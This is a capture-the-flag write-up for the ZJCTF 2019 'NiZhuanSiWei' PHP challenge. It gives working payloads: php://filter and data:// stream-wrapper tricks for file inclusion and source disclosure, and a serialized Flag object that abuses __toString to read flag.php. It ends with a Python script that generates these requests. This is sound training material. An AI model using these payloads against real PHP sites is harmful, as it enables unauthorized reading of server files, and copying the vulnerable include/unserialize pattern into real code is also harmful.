(Deserialization) [ZJCTF 2019]NiZhuanSiWei

Challenge source, index.php (it is printed via highlight_file() when the parameters are missing):

```php
<?php
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
// $text must be a path whose contents equal this exact string
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    // only $file is checked for "flag"; $password is not
    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit();
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;  // echo on an object calls its __toString()
    }
}
else{
    highlight_file(__FILE__);
}
?>
```

Exploitation points:

include() and echo.

Because `$file` is checked with `preg_match("/flag/", $file)`, flag.php cannot be included or read through the `file` parameter directly.

Look at useless.php first.

PHP stream wrappers (pseudo-protocols) are used here: `php://filter` with `convert.base64-encode` returns the source of useless.php base64-encoded instead of executing it, and `data://` makes `file_get_contents($text)` return exactly `welcome to the zjctf`, which the first check requires.

?file=php://filter/convert.base64-encode/resource=useless.php&text=data://text/plain;base64,welcome to the zjctf

After base64-encoding the text parameter we get:

?file=php://filter/convert.base64-encode/resource=useless.php&text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=

The response contains:

PD9waHAgIAoKY2xhc3MgRmxhZ3sgIC8vZmxhZy5waHAgIAogICAgcHVibGljICRmaWxlOyAgCiAgICBwdWJsaWMgZnVuY3Rpb24gX190b3N0cmluZygpeyAgCiAgICAgICAgaWYoaXNzZXQoJHRoaXMtPmZpbGUpKXsgIAogICAgICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGlzLT5maWxlKTsgCiAgICAgICAgICAgIGVjaG8gIjxicj4iOwogICAgICAgIHJldHVybiAoIlUgUiBTTyBDTE9TRSAhLy8vQ09NRSBPTiBQTFoiKTsKICAgICAgICB9ICAKICAgIH0gIAp9ICAKPz4gIAo

Decoded, this is useless.php:

```php
<?php

class Flag{  //flag.php
    public $file;
    public function __tostring(){
        if(isset($this->file)){
            echo file_get_contents($this->file);  // reads whatever path we put in $file
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }
    }
}
?>
```

The deserialization sink is here: `echo $password` on the unserialized object calls `Flag::__toString()`, which runs `file_get_contents($this->file)`, so all we need is a Flag object whose `file` property is flag.php. The /flag/ filter only inspects `$file`, so "flag.php" inside `password` is not blocked.

?file=php://filter/convert.base64-encode/resource=useless.php&text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";} //this doesn't work

//I only found the problem after reading other people's writeups

//Also, the double quotes in my earlier serialized payload were full-width Chinese quotes (embarrassing)

?file=useless.php&text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

Note that `file` has to be changed back from php://filter/convert.base64-encode/resource=useless.php to plain useless.php.

With the filter wrapper, include() receives base64 text rather than PHP code, so nothing is executed and the Flag class is never defined; unserialize() then produces a __PHP_Incomplete_Class object with no __toString(), and echo fails instead of reading the flag.

One more point: echo on an object triggers its __toString(), which is what makes the file read happen here.
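As an added example (not the writeup author's code; written in Python so it runs stand-alone), the following builds the two requests used above: a small PHP-serialize routine that covers more than the single Flag object (strings, ints, bools, null and objects with public properties), the data:// and php://filter wrapper URIs, and a mirror of the /flag/ check so a blocked `file` value is caught before the request is sent. The function names and the `build_params`/`build_query` helpers are assumptions of this example; the welcome string, the wrapper forms and the Flag/file names come from the writeup.

```python
import base64
import re
from urllib.parse import urlencode

# Value quoted in the writeup; everything else here is constructed for the example.
WELCOME = "welcome to the zjctf"


def php_serialize(value):
    """Serialize a Python value in PHP serialize() format.

    Supports None, bool, int, str, and objects expressed as a
    (class_name, {property: value}) tuple with public properties only.
    String lengths are byte lengths, as PHP counts them.
    """
    if value is None:
        return "N;"
    if isinstance(value, bool):          # before int: bool is a subclass of int
        return "b:%d;" % int(value)
    if isinstance(value, int):
        return "i:%d;" % value
    if isinstance(value, str):
        return 's:%d:"%s";' % (len(value.encode("utf-8")), value)
    if isinstance(value, tuple) and len(value) == 2:
        class_name, props = value
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in props.items())
        return 'O:%d:"%s":%d:{%s}' % (len(class_name), class_name, len(props), body)
    raise TypeError("unsupported type: %s" % type(value).__name__)


def data_uri(text):
    """data:// wrapper whose file_get_contents() result is exactly `text`."""
    return "data://text/plain;base64," + base64.b64encode(text.encode("utf-8")).decode("ascii")


def filter_read_uri(path):
    """php://filter wrapper that returns `path` base64-encoded instead of executing it."""
    return "php://filter/convert.base64-encode/resource=" + path


def passes_file_filter(file_param):
    """Mirror of the challenge's preg_match("/flag/", $file) check."""
    return re.search(r"flag", file_param) is None


def build_params(target="flag.php", file_param="useless.php"):
    """GET parameters for the final request; rejects a `file` the filter would block."""
    if not passes_file_filter(file_param):
        raise ValueError("file=%r matches /flag/ and would be rejected" % file_param)
    return {
        "text": data_uri(WELCOME),
        "file": file_param,  # must really include useless.php, not a filter view of it
        "password": php_serialize(("Flag", {"file": target})),
    }


def build_query(params):
    """URL-encode the parameters; quotes and braces in the serialized object get escaped."""
    return urlencode(params)


if __name__ == "__main__":
    # step 1: leak useless.php source (the text check still has to pass)
    print(build_query({"text": data_uri(WELCOME), "file": filter_read_uri("useless.php")}))
    # step 2: include the real useless.php and unserialize a Flag pointing at flag.php
    print(build_query(build_params()))
```

The `password` value is the same serialized string as in the final payload above, only percent-encoded; `build_params` refuses anything like `file=flag.php` or a filter wrapper over flag.php, which is exactly what the server's /flag/ check would reject.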
